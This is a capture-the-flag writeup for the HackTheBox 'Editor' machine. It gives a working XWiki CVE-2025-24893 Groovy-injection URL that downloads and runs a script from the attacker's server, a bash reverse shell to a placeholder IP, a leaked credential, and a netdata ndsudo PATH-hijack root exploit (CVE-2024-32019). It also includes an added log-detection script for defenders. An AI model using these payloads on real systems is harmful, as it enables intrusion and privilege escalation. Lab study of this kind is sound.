Editor HackTheBox Writeup

HackTheBox - Editor

Recon

As usual, we will start with an Nmap scan

nmap -sC -sV --min-rate 5000 -T5 -Pn -p- 10.10.11.80

Looking at the result, we have

  • 22/tcp open ssh OpenSSH
  • 80/tcp open http nginx
  • 8080/tcp open http Jetty

Let's add editor.htb to our hosts file

echo "10.10.11.80 editor.htb" | sudo tee -a /etc/hosts

Web Enumeration

On port 80 we have

And on port 8080

I saw the XWiki version at the bottom. When I googled it, I came across CVE-2025-24893.

For the exploit, I found this exploit. To get the shell, we first need to create shell.sh

#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP>/9001 0>&1

After creating shell.sh, start a Python server on your local machine

python3 -m http.server 8000

Then paste this encoded URL in the browser

 http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln("wget%20-qO%20/tmp/shell.sh%20http://10.10.14.205:8000/shell.sh".execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

Then start a listener of your choice; mine is netcat

rlwrap nc -lvnp 9001

Then execute your payload

http://editor.htb:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22bash%20/tmp/shell.sh%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

And boom, you've got your shell

In /etc/passwd you will find that there is a user called oliver
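For defenders, the two requests above leave a recognizable trace in the web server's access log: a SolrSearch request whose text parameter decodes to XWiki macro syntax. The following detection sketch is an added example, not part of the original writeup; the combined log format, the function names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Opening tag of an XWiki macro, e.g. {{groovy}} or {{async async=false}}.
MACRO = re.compile(r"\{\{\s*([A-Za-z]+)")

def suspicious_macros(log_line):
    """Return macro names found in the text= parameter of a SolrSearch request."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/Main/SolrSearch"):
        return []
    # parse_qs percent-decodes, so %7B%7Bgroovy%7D%7D becomes {{groovy}}.
    params = parse_qs(url.query)
    found = []
    for value in params.get("text", []):
        found += [name.lower() for name in MACRO.findall(value)]
    return found

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=meeting%20notes HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(1)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2025:10:00:09 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 9000',
]

def scan(lines):
    """Return (source_ip, macros) for every line that carries macro syntax."""
    hits = []
    for line in lines:
        macros = suspicious_macros(line)
        if macros:
            hits.append((line.split()[0], macros))
    return hits

if __name__ == "__main__":
    for ip, macros in scan(SAMPLE_LOG):
        print(f"{ip}: macro syntax in SolrSearch text parameter: {macros}")
```

Any macro opener in a search term is flagged, which goes slightly beyond the groovy and async macros used on this page; an ordinary search string rarely contains `{{`.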

oliver:x:1000:1000:,,,:/home/oliver:/bin/bash

Then in the WEB-INF directory you will find hibernate.cfg.xml, in which you will find the password of Oliver

theEd1t0rTeam99

ssh oliver@editor.htb

Logging in as the user, we get our user.txt

Getting the Root

On localhost at port 19999 there is a service running called netdata

So we did some port forwarding

ssh -L 19999:127.0.0.1:19999 oliver@editor.htb

Paste this in your browser

http://localhost:19999/

Clicking on "Please update them", we get the version 1.45.2

After digging around the internet we find CVE-2024-32019. Oliver has permission to run ndsudo:

  1. Place an executable that is on ndsudo’s list of commands (e.g. nvme) in a writable path
  2. Set the PATH environment variable so that it contains this path
  3. Run ndsudo with a command that will run the aforementioned executable

First we need to write exploit.c, then compile it

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);       // Switch to root
    setgid(0);       // Switch group to root
    system("/bin/bash");  // Spawn a root shell
    return 0;
}

Then compile it

gcc -o nvme exploit.c

Then we need to upload the compiled exploit (nvme) to Oliver's /tmp directory; for that we will use a Python server

python3 -m http.server 8000

Then run the following

curl http://<YOUR-IP>:8000/nvme -o nvme
chmod +x nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

And boom, we've got root.txt